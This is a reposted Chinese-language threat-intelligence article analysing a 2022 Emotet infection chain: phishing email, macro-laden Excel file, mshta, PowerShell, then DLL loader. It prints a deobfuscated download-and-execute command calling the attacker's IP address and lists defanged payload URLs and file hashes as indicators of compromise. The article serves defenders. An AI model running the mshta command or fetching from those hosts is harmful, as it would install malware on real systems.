惡意軟體Emotet 的新攻擊方法
Emotet 曾經是惡意軟體領域的霸主,經常變換攻擊模式。在 2021 年年底,研究人員就發現 Emotet 啟用了一種新的攻擊方法。
攻擊通過帶有惡意 Excel 檔案的魚叉郵件發起,Excel 文件中包含混淆的 Excel 4.0 巨集。啟用巨集程式碼後,樣本會下載並執行一個 HTML 應用程式,再下載後續的 PowerShell 指令碼以及 Emotet 惡意樣本。
“光輝”歷史
Emotet 最早在 2014 年被發現,此後一直保持活躍。2021 年 1 月,執法機構關停了 Emotet 在全球的基礎設施。該惡意軟體一度銷聲匿跡,但在 2021 年 11 月 Emotet 正式迴歸。
Emotet 經常使用執行緒劫持發起攻擊,據此 Emotet 可以在失陷主機的 Emotet 郵件客戶端中為正常電子郵件生成偽造回覆郵件。
Emotet 自從迴歸後使用了不同的攻擊方法。2021 年 12 月,Emotet 在惡意郵件中攜帶了下載虛假的 Adobe 應用程式安裝包的惡意連結。而在 2022 年,Emotet 轉而使用帶有惡意附件的電子郵件進行攻擊。
有時候,Emotet 使用加密的 ZIP 檔案作為附件檔案。有時候,直接將 Excel 檔案作為附件。
電子郵件
Emotet 發現了一封 2021 年 6 月的電子郵件,在 2022 年 1 月 27 日傳送了一封虛假的回覆郵件。郵件帶有加密的壓縮檔案,而密碼在郵件中提供。
電子郵件
誘餌文件
加密的壓縮檔案中包含一個帶有 Excel 4.0 巨集的 Excel 檔案,並且顯著提示使用者要啟用巨集。
誘餌文件
巨集被啟用後,執行
cmd.exe
執行
mshta.ext
。利用十六進位制和字元混淆來繞過靜態檢測措施,去混淆後為
cmd /c mshta hxxp://91.240.118.168/se/s.html
。
巨集程式碼
HTML 檔案是高度混淆的,執行會下載額外的 PowerShell 程式碼。
混淆 HTML 應用程式
PowerShell
混淆的 PowerShell 指令碼通過
hxxp://91.240.118.168/se/s.png
下載拉取 Emotet 的第二個 PowerShell 指令碼。
PowerShell 程式碼
第二個 PowerShell 指令碼中包含 14 個 URL,指令碼會嘗試每個 URL 來下載 Emotet 惡意樣本。部署多個 URL 使得攻擊基礎設施的彈性更好。
拉取流量
攻擊鏈的最後,通過 DLL 加密資源段載入 Emotet 執行。
Emotet 樣本
結論
Emotet 是一個高度活躍的家族,為了逃避檢測會經常變換打法。最新的攻擊鏈顯示,Emotet 會綜合使用多種型別的檔案和高度混淆的指令碼發起攻擊。
IOC
9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9
6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88
9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1
5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed
2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f
hxxp://unifiedpharma.com/wp-content/5arxM/
hxxp://hotelamerpalace.com/Fox-C404/LEPqPJpt4Gbr8BHAn/
hxxps://connecticutsfinestmovers.com/Fox-C/mVwOqxT17gVWaE8E/
hxxp://icfacn.com/runtime/n7qA2YStudp/
hxxps://krezol-group.com:443/images/PmLGLKYeCBs5d/
hxxp://ledcaopingdeng.com/wp-includes/Qq39yj7fpvk/
hxxp://autodiscover.karlamejia.com/wp-admin/hcdnVlRIiwvTVrJjJEE/
hxxps://crmweb.info:443/bitrix/rc9XjtwF/
hxxp://accessunited-bank.com/admin/hzIgVwq8btak/
hxxp://pigij.com/wp-admin/MVW5/
hxxp://artanddesign.one/wp-content/uploads/A2cZL7/
hxxp://strawberry.kids-singer.net/assets_c/WAdvNT84Dmu/
hxxps://eleccom.shop:443/services/AEjSDj/
hxxps://izocab.com/nashi-klienty/B5SC/
參考來源
來自 “ Freebuf. ”, 原文作者:Avenger;原文連結:https://www.freebuf.com/articles/network/322712.html,如有侵權,請聯絡管理員刪除。
相關文章
- TrickBot和Emotet再奪惡意軟體之冠
- 阻止惡意軟體和網路攻擊的基本方式
- 惡意 Prompt 攻擊
- 黑客利用Excel文件來執行ChainShot惡意軟體攻擊黑客ExcelAI
- 防止惡意攻擊,伺服器DDoS防禦軟體科普伺服器
- 惡意軟體日均進攻百萬次!三大方法保護Hadoop叢集免遭攻擊!Hadoop
- covd惡意包攻擊案例
- 什麼是無檔案惡意軟體攻擊?如何防禦?
- 前端 防止使用 target="_blank" 的惡意攻擊前端
- 利用惡意頁面攻擊本地 Xdebug
- 如何防禦惡意流量攻擊(CC、DDoS)?
- 數百家媒體機構被部署惡意軟體,美國新聞行業遭受供應鏈攻擊行業
- 惡意攻擊仍佔資料洩露的 64%
- NoiseMe:瞄準加密貨幣交易機器人的新型惡意軟體攻擊分析報告加密機器人
- 新的破壞性惡意軟體"流星"雨刷用於伊朗鐵路襲擊
- Android 更新伺服器遭黑客攻擊 ,德產手機被安裝惡意軟體Android伺服器黑客
- Oracle 惡意攻擊問題分析和解決(一)Oracle
- 攻擊者使用SQLite資料庫中的惡意程式碼攻擊應用程式SQLite資料庫
- 警惕!75%的Office 365賬戶遭受惡意接管攻擊
- 如何防止伺服器被惡意網路攻擊?伺服器
- 如何預防工業物聯網中的惡意攻擊?
- linux ddos惡意軟體分析Linux
- 惡意軟體Linux/Mumblehard分析Linux
- Zero Access惡意軟體分析
- 報告發布|觀察:攻擊者蹭疫情熱點進行惡意攻擊
- BlackBerry《季度全球威脅情報報告》顯示新型惡意軟體攻擊活動激增 70%
- 2023年Q2全球主要惡意軟體攻擊來源佔比(附原資料表)
- 分佈超過800個惡意NPM包 軟體供應鏈攻擊活動增長迅速NPM
- 最新惡意軟體來襲!專攻Windows盜版使用者Windows
- Synology警告惡意軟體透過暴力攻擊用勒索軟體感染NAS裝置
- 科幻:Windows核心攻擊是指標對Windows作業系統核心的惡意攻擊行為Windows指標作業系統
- 思否社群正在遭受持續的大規模惡意攻擊
- 分散式的節點能有效地防止惡意攻擊事件分散式事件
- 一鍵遮蔽惡意IP!保護你的伺服器免受攻擊伺服器
- 是防毒軟體”失職“還是惡意軟體太”狡猾“?惡意軟體可繞過Android防護系統防毒Android
- 2023年Q2全球金融惡意軟體攻擊獨立使用者數量(附原資料表)
- 每週下載數百萬次!惡意軟體包感染Linux和Windows裝置引發供應鏈攻擊LinuxWindows
- 惡意軟體PE檔案重建指南